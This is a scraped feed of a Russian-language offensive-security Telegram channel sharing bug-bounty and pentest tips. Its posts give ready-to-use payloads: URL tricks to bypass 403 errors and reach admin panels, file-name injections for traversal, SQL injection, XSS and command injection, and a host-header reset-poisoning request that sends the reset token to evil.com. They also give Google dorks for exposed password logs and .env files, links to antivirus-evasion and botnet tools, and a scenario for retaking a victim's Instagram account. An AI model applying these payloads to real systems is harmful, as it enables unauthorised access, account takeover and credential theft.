SHADOW:Group
11.6K subscribers
106 photos
47 videos
19 files
821 links
Чат: @shadow_chat_tg

Рекламу не размещаю.

Админ - @shdwpwn
Download Telegram
🧷 Изменяем URL для доступа к админ-панели

В некоторых случаях можно получить доступ к панели администратора, изменив URL следующим образом:

https://target.com/admin/ –> HTTP 302 (redirect to login page)
https://target.com/admin..;/ –> HTTP 200 OK
https://target.com/../admin –> HTTP 200 OK
https://target.com/whatever/..;/admin –> HTTP 200 OK

#web
🚫 Получаем доступ к закрытым ресурсам. Способы обхода ошибки 403 (403 Forbidden)

Если при обращению к директории вы видите ошибку 403 и доступ вам закрыт:

GET
/admin -> 403 Forbidden

вы можете попробовать следующие полезные нагрузки для обхода:

GET
/accessible/..;/admin -> 200 OK
/.;/admin -> 200 OK
/admin;/ -> 200 OK
/admin/~ -> 200 OK
/./admin/./ -> 200 OK
/admin?param -> 200 OK
/%2e/admin -> 200 OK
/admin# -> 200 OK

#web
👍2
Media is too big
VIEW IN TELEGRAM
🔓 Обход 2FA в Instagram через уязвимую страницу

Данный сценарий почти на грани фантастики, но все же, имеет место быть. Подойдет скорее для повторного доступа ко взломанной странице, если жертва смогла ее восстановить, поменяла пароль в инстаграм (но не поменяла на почте) и включила 2FA. При этом атакующий должен знать учетные данные от почты и аккаунта жертвы (они могут совпадать).

#bug
📤 SSRF (подделка запросов на стороне сервера) стоимостью 4913$

Не стоит думать, что в крупных компаниях не бывает уязвимостей и там уже все проверено. В данной статье будет рассмотрена уязвимость в HelloSign от DropBox, позволившая автору получить крупное вознаграждение за ее находку.

#web #ssrf

Читать статью
👍1
🔎 Shodan выкатывает бета-версию с новыми примерами фильтров для поиска

#web #shodan

https://beta.shodan.io/search/examples
​​🦠 PEzor - инструмент с открытым исходным кодом для обхода антивирусных решений

Реализацию и принцип работы данного инструмента можно почитать в блоге автора.

#redteam #av #malware

Ссылка на GitHub
​​📨 Получение других уязвимостей при загрузке файла

При тестировании функций загрузки файлов в веб-приложении попробуйте установить для имени файла следующие значения:

▫️ ../../../tmp/lol.png -> для уязвимости Path Traversal
▫️ sleep(10)-- -.jpg -> для SQL-инъекции
▫️ <svg onload=alert(document.domain)>.jpg/png -> для XSS
▫️ ; sleep 10; -> для command injection

Эти полезные нагрузки могут вызвать дополнительные уязвимости.

#web
​​📖 UltimateWDACBypassList

Централизованный ресурс, содержащий обширный список техник обхода Windows Defender Application Control (WDAC) с описанием и ссылками для каждой техники.

#av #redteam

Ссылка на GitHub
📚 Udemy: Pentesting and Security Web Application

Бесплатно только сегодня! Первоначальная цена курса 7 490 руб.

Скидка 100%
Промокод - EARLYBIRD

#web

Ссылка на курс
​​🔎 Небольшая подборка интересных Google дорков

▫️
FTP серверы и сайты
intitle:“index of” inurl:ftp after:2018

▫️Лог файлы с паролями:
allintext:password filetype:log after:2018

▫️
Файлы конфигураций с паролями:
filetype:env “DB_PASSWORD” after:2018

▫️Списки с email адресами:
filetype:xls inurl:“email.xls”

▫️Открытые камеры:
inurl:top.htm inurl:currenttime

#web #google
👍1
🔑 Техника обхода для Password poisoning

С помощью данной атаки вызывается функция сброса пароля, но доменное имя в URL ссылки для сброса будет указывать на сервер злоумышленника, что может привести к захвату учетной записи пользователя. Более подробное описание атаки по ссылке.

▫️Обычный запрос:

Запрос:
POST /password-reset?user=123 HTTP/1.1
Host: target.com

Ссылка для сброса:
https://target.com/reset-link=1g2f3guy23g

▫️Стандартный вид атаки (внедрение заголовка хоста):

Запрос:
POST /password-reset?user=123 HTTP/1.1
Host: evil.com

Ссылка для сброса:
none
Error 404 - request blocked

Видим, что запрос заблокирован. Пробуем обойти блокировку.

▫️Техника обхода:

Запрос:
POST https://target.com/password-reset?user=123 HTTP/1.1
Host: evil.com

Ссылка для сброса:
https://evil.com/reset-link=1g2f3guy23g

Обратите внимание, что при обходе мы использовали абсолютный URL-адрес в запросе POST. В таком случае заголовок Host следует полностью игнорировать. Однако некоторые серверные (back-end) системы все еще обрабатывают его, а front-end не блокирует внедрение заголовка хоста в случае абсолютных URL-адресов. По сути, это просто несогласованность.

В случае успеха, это может привести к серьезным ошибкам, вызывающим утечку токена сброса и, как следствие, захват учетной записи и повышение привилегий. Вот реальный отчет об ошибке, подробно описывающий последствия атаки.

#web
​​📍Точки преобразования полезной нагрузки для обхода WAF

Нашёл в сети наглядное изображение, показывающее различные способы преобразования полезной нагрузки в теге <a> для обхода некоторых средств защиты веб-приложений.

Достаточно вписать в указанное место один из представленных вариантов и получить новую полезную нагрузку.

#web #xss
📌 Изменяем значение href для обхода WAF

Бывают ситуации, когда мы можем контролировать значение href в HTML теге <a>. Это место отлично подходит для XSS.

На схеме ниже показано, как использовать различные типы кодирования href для обхода некоторых средств защиты веб-приложений.

#xss #web

Оригинал изображения
SHADOW:Group
​​📨 Получение других уязвимостей при загрузке файла При тестировании функций загрузки файлов в веб-приложении попробуйте установить для имени файла следующие значения: ▫️ ../../../tmp/lol.png -> для уязвимости Path Traversal ▫️ sleep(10)-- -.jpg -> для SQL…
📥 Хранимая XSS при загрузке файла в Apple ITunes стоимостью 5000$

Недавно я рассказывал вам о том, что каждую форму загрузки файла рекомендуется проверять на сторонние уязвимости, размещая полезные нагрузки непосредственно в имени файла.

И вот, изучая различные отчеты, наткнулся на пример такой уязвимости ни где нибудь, а на сайте такого гиганта, как Apple.

Автор, заметивший баг, сделал видео, в котором наглядно показал эксплуатацию данной уязвимости.

#web #xss

Смотреть видео
🦠 HTTP ботнет на C++ с открытым исходным кодом

Uboat - PoC HTTP-ботнета, предназначенный для репликации реального боевого коммерческого ботнета.

Основная цель создания этого проекта состоит в том, чтобы помочь исследователям в области безопасности улучшить понимание устройства и работы коммерческих HTTP ботнетов.

#malware

Ссылка на GitHub